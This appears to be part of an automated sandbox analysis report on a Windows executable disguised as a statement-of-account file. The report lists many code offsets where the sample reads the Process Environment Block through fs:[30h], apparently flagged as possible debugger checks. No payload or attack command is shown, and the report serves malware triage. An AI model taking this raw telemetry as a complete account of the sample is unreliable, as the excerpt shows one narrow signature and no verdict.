Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018401C0 mov eax, dword ptr fs:[00000030h]	2_2_018401C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018401C0 mov eax, dword ptr fs:[00000030h]	2_2_018401C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018451C0 mov eax, dword ptr fs:[00000030h]	2_2_018451C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018451C0 mov eax, dword ptr fs:[00000030h]	2_2_018451C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018451C0 mov eax, dword ptr fs:[00000030h]	2_2_018451C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018451C0 mov eax, dword ptr fs:[00000030h]	2_2_018451C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0183A1E3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0183A1E3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0183A1E3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0183A1E3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A1E3 mov eax, dword ptr fs:[00000030h]	2_2_0183A1E3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F81EE mov eax, dword ptr fs:[00000030h]	2_2_018F81EE
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F81EE mov eax, dword ptr fs:[00000030h]	2_2_018F81EE
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018391E5 mov eax, dword ptr fs:[00000030h]	2_2_018391E5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018391E5 mov eax, dword ptr fs:[00000030h]	2_2_018391E5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018281EB mov eax, dword ptr fs:[00000030h]	2_2_018281EB
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018291F0 mov eax, dword ptr fs:[00000030h]	2_2_018291F0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018291F0 mov eax, dword ptr fs:[00000030h]	2_2_018291F0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018401F1 mov eax, dword ptr fs:[00000030h]	2_2_018401F1
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018401F1 mov eax, dword ptr fs:[00000030h]	2_2_018401F1
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018401F1 mov eax, dword ptr fs:[00000030h]	2_2_018401F1
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F1F0 mov eax, dword ptr fs:[00000030h]	2_2_0185F1F0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F1F0 mov eax, dword ptr fs:[00000030h]	2_2_0185F1F0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185510F mov eax, dword ptr fs:[00000030h]	2_2_0185510F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183510D mov eax, dword ptr fs:[00000030h]	2_2_0183510D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01867128 mov eax, dword ptr fs:[00000030h]	2_2_01867128
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01867128 mov eax, dword ptr fs:[00000030h]	2_2_01867128
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF13E mov eax, dword ptr fs:[00000030h]	2_2_018EF13E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182A147 mov eax, dword ptr fs:[00000030h]	2_2_0182A147
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182A147 mov eax, dword ptr fs:[00000030h]	2_2_0182A147
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182A147 mov eax, dword ptr fs:[00000030h]	2_2_0182A147
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01903157 mov eax, dword ptr fs:[00000030h]	2_2_01903157
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01903157 mov eax, dword ptr fs:[00000030h]	2_2_01903157
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01903157 mov eax, dword ptr fs:[00000030h]	2_2_01903157
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01905149 mov eax, dword ptr fs:[00000030h]	2_2_01905149
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0188717A mov eax, dword ptr fs:[00000030h]	2_2_0188717A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0188717A mov eax, dword ptr fs:[00000030h]	2_2_0188717A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01836179 mov eax, dword ptr fs:[00000030h]	2_2_01836179
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01904080 mov eax, dword ptr fs:[00000030h]	2_2_01904080
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01904080 mov eax, dword ptr fs:[00000030h]	2_2_01904080
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01904080 mov eax, dword ptr fs:[00000030h]	2_2_01904080
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01904080 mov eax, dword ptr fs:[00000030h]	2_2_01904080
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01904080 mov eax, dword ptr fs:[00000030h]	2_2_01904080
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01904080 mov eax, dword ptr fs:[00000030h]	2_2_01904080
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01904080 mov eax, dword ptr fs:[00000030h]	2_2_01904080
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182A093 mov ecx, dword ptr fs:[00000030h]	2_2_0182A093
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182C090 mov eax, dword ptr fs:[00000030h]	2_2_0182C090
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EB0AF mov eax, dword ptr fs:[00000030h]	2_2_018EB0AF
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018700A5 mov eax, dword ptr fs:[00000030h]	2_2_018700A5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_019050B7 mov eax, dword ptr fs:[00000030h]	2_2_019050B7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_018DF0A5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_018DF0A5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_018DF0A5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_018DF0A5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_018DF0A5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_018DF0A5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF0A5 mov eax, dword ptr fs:[00000030h]	2_2_018DF0A5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184B0D0 mov eax, dword ptr fs:[00000030h]	2_2_0184B0D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B0D6 mov eax, dword ptr fs:[00000030h]	2_2_0182B0D6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B0D6 mov eax, dword ptr fs:[00000030h]	2_2_0182B0D6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B0D6 mov eax, dword ptr fs:[00000030h]	2_2_0182B0D6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B0D6 mov eax, dword ptr fs:[00000030h]	2_2_0182B0D6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182C0F6 mov eax, dword ptr fs:[00000030h]	2_2_0182C0F6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186D0F0 mov eax, dword ptr fs:[00000030h]	2_2_0186D0F0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186D0F0 mov ecx, dword ptr fs:[00000030h]	2_2_0186D0F0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018290F8 mov eax, dword ptr fs:[00000030h]	2_2_018290F8
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018290F8 mov eax, dword ptr fs:[00000030h]	2_2_018290F8
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018290F8 mov eax, dword ptr fs:[00000030h]	2_2_018290F8
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018290F8 mov eax, dword ptr fs:[00000030h]	2_2_018290F8
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01855004 mov eax, dword ptr fs:[00000030h]	2_2_01855004
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01855004 mov ecx, dword ptr fs:[00000030h]	2_2_01855004
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01838009 mov eax, dword ptr fs:[00000030h]	2_2_01838009
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182D02D mov eax, dword ptr fs:[00000030h]	2_2_0182D02D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190505B mov eax, dword ptr fs:[00000030h]	2_2_0190505B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01831051 mov eax, dword ptr fs:[00000030h]	2_2_01831051
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01831051 mov eax, dword ptr fs:[00000030h]	2_2_01831051
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018D9060 mov eax, dword ptr fs:[00000030h]	2_2_018D9060
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01837072 mov eax, dword ptr fs:[00000030h]	2_2_01837072
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01836074 mov eax, dword ptr fs:[00000030h]	2_2_01836074
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01836074 mov eax, dword ptr fs:[00000030h]	2_2_01836074
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01831380 mov eax, dword ptr fs:[00000030h]	2_2_01831380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01831380 mov eax, dword ptr fs:[00000030h]	2_2_01831380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01831380 mov eax, dword ptr fs:[00000030h]	2_2_01831380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01831380 mov eax, dword ptr fs:[00000030h]	2_2_01831380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01831380 mov eax, dword ptr fs:[00000030h]	2_2_01831380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184F380 mov eax, dword ptr fs:[00000030h]	2_2_0184F380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184F380 mov eax, dword ptr fs:[00000030h]	2_2_0184F380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184F380 mov eax, dword ptr fs:[00000030h]	2_2_0184F380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184F380 mov eax, dword ptr fs:[00000030h]	2_2_0184F380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184F380 mov eax, dword ptr fs:[00000030h]	2_2_0184F380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184F380 mov eax, dword ptr fs:[00000030h]	2_2_0184F380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF38A mov eax, dword ptr fs:[00000030h]	2_2_018EF38A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185A390 mov eax, dword ptr fs:[00000030h]	2_2_0185A390
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185A390 mov eax, dword ptr fs:[00000030h]	2_2_0185A390
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185A390 mov eax, dword ptr fs:[00000030h]	2_2_0185A390
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018393A6 mov eax, dword ptr fs:[00000030h]	2_2_018393A6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018393A6 mov eax, dword ptr fs:[00000030h]	2_2_018393A6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AC3B0 mov eax, dword ptr fs:[00000030h]	2_2_018AC3B0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182E3C0 mov eax, dword ptr fs:[00000030h]	2_2_0182E3C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182E3C0 mov eax, dword ptr fs:[00000030h]	2_2_0182E3C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182E3C0 mov eax, dword ptr fs:[00000030h]	2_2_0182E3C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182C3C7 mov eax, dword ptr fs:[00000030h]	2_2_0182C3C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018363CB mov eax, dword ptr fs:[00000030h]	2_2_018363CB
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018633D0 mov eax, dword ptr fs:[00000030h]	2_2_018633D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018B43D5 mov eax, dword ptr fs:[00000030h]	2_2_018B43D5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01829303 mov eax, dword ptr fs:[00000030h]	2_2_01829303
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01829303 mov eax, dword ptr fs:[00000030h]	2_2_01829303
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF30A mov eax, dword ptr fs:[00000030h]	2_2_018EF30A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184E310 mov eax, dword ptr fs:[00000030h]	2_2_0184E310
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184E310 mov eax, dword ptr fs:[00000030h]	2_2_0184E310
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184E310 mov eax, dword ptr fs:[00000030h]	2_2_0184E310
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01849319 mov eax, dword ptr fs:[00000030h]	2_2_01849319
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01903336 mov eax, dword ptr fs:[00000030h]	2_2_01903336
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185332D mov eax, dword ptr fs:[00000030h]	2_2_0185332D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182E328 mov eax, dword ptr fs:[00000030h]	2_2_0182E328
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182E328 mov eax, dword ptr fs:[00000030h]	2_2_0182E328
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182E328 mov eax, dword ptr fs:[00000030h]	2_2_0182E328
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01828347 mov eax, dword ptr fs:[00000030h]	2_2_01828347
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01828347 mov eax, dword ptr fs:[00000030h]	2_2_01828347
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01828347 mov eax, dword ptr fs:[00000030h]	2_2_01828347
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B360 mov eax, dword ptr fs:[00000030h]	2_2_0183B360
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B360 mov eax, dword ptr fs:[00000030h]	2_2_0183B360
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B360 mov eax, dword ptr fs:[00000030h]	2_2_0183B360
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B360 mov eax, dword ptr fs:[00000030h]	2_2_0183B360
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B360 mov eax, dword ptr fs:[00000030h]	2_2_0183B360
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B360 mov eax, dword ptr fs:[00000030h]	2_2_0183B360
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E363 mov eax, dword ptr fs:[00000030h]	2_2_0186E363
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E363 mov eax, dword ptr fs:[00000030h]	2_2_0186E363
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E363 mov eax, dword ptr fs:[00000030h]	2_2_0186E363
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E363 mov eax, dword ptr fs:[00000030h]	2_2_0186E363
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E363 mov eax, dword ptr fs:[00000030h]	2_2_0186E363
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E363 mov eax, dword ptr fs:[00000030h]	2_2_0186E363
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E363 mov eax, dword ptr fs:[00000030h]	2_2_0186E363
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E363 mov eax, dword ptr fs:[00000030h]	2_2_0186E363
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE372 mov eax, dword ptr fs:[00000030h]	2_2_018AE372
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE372 mov eax, dword ptr fs:[00000030h]	2_2_018AE372
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE372 mov eax, dword ptr fs:[00000030h]	2_2_018AE372
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE372 mov eax, dword ptr fs:[00000030h]	2_2_018AE372
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018B0371 mov eax, dword ptr fs:[00000030h]	2_2_018B0371
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018B0371 mov eax, dword ptr fs:[00000030h]	2_2_018B0371
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185237A mov eax, dword ptr fs:[00000030h]	2_2_0185237A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE289 mov eax, dword ptr fs:[00000030h]	2_2_018AE289
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01837290 mov eax, dword ptr fs:[00000030h]	2_2_01837290
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01837290 mov eax, dword ptr fs:[00000030h]	2_2_01837290
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01837290 mov eax, dword ptr fs:[00000030h]	2_2_01837290
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF2AE mov eax, dword ptr fs:[00000030h]	2_2_018EF2AE
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F92AB mov eax, dword ptr fs:[00000030h]	2_2_018F92AB
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018542AF mov eax, dword ptr fs:[00000030h]	2_2_018542AF
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018542AF mov eax, dword ptr fs:[00000030h]	2_2_018542AF
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190B2BC mov eax, dword ptr fs:[00000030h]	2_2_0190B2BC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190B2BC mov eax, dword ptr fs:[00000030h]	2_2_0190B2BC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190B2BC mov eax, dword ptr fs:[00000030h]	2_2_0190B2BC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190B2BC mov eax, dword ptr fs:[00000030h]	2_2_0190B2BC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018292AF mov eax, dword ptr fs:[00000030h]	2_2_018292AF
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182C2B0 mov ecx, dword ptr fs:[00000030h]	2_2_0182C2B0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018532C5 mov eax, dword ptr fs:[00000030h]	2_2_018532C5
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_019032C9 mov eax, dword ptr fs:[00000030h]	2_2_019032C9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018272E0 mov eax, dword ptr fs:[00000030h]	2_2_018272E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0183A2E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0183A2E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0183A2E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0183A2E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0183A2E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0183A2E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018382E0 mov eax, dword ptr fs:[00000030h]	2_2_018382E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018382E0 mov eax, dword ptr fs:[00000030h]	2_2_018382E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018382E0 mov eax, dword ptr fs:[00000030h]	2_2_018382E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018382E0 mov eax, dword ptr fs:[00000030h]	2_2_018382E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182D2EC mov eax, dword ptr fs:[00000030h]	2_2_0182D2EC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182D2EC mov eax, dword ptr fs:[00000030h]	2_2_0182D2EC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018402F9 mov eax, dword ptr fs:[00000030h]	2_2_018402F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018402F9 mov eax, dword ptr fs:[00000030h]	2_2_018402F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018402F9 mov eax, dword ptr fs:[00000030h]	2_2_018402F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018402F9 mov eax, dword ptr fs:[00000030h]	2_2_018402F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018402F9 mov eax, dword ptr fs:[00000030h]	2_2_018402F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018402F9 mov eax, dword ptr fs:[00000030h]	2_2_018402F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018402F9 mov eax, dword ptr fs:[00000030h]	2_2_018402F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018402F9 mov eax, dword ptr fs:[00000030h]	2_2_018402F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182A200 mov eax, dword ptr fs:[00000030h]	2_2_0182A200
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182821B mov eax, dword ptr fs:[00000030h]	2_2_0182821B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BB214 mov eax, dword ptr fs:[00000030h]	2_2_018BB214
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BB214 mov eax, dword ptr fs:[00000030h]	2_2_018BB214
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018B0227 mov eax, dword ptr fs:[00000030h]	2_2_018B0227
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018B0227 mov eax, dword ptr fs:[00000030h]	2_2_018B0227
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018B0227 mov eax, dword ptr fs:[00000030h]	2_2_018B0227
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186A22B mov eax, dword ptr fs:[00000030h]	2_2_0186A22B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186A22B mov eax, dword ptr fs:[00000030h]	2_2_0186A22B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186A22B mov eax, dword ptr fs:[00000030h]	2_2_0186A22B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01850230 mov ecx, dword ptr fs:[00000030h]	2_2_01850230
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF247 mov eax, dword ptr fs:[00000030h]	2_2_018EF247
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F24A mov eax, dword ptr fs:[00000030h]	2_2_0185F24A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B273 mov eax, dword ptr fs:[00000030h]	2_2_0182B273
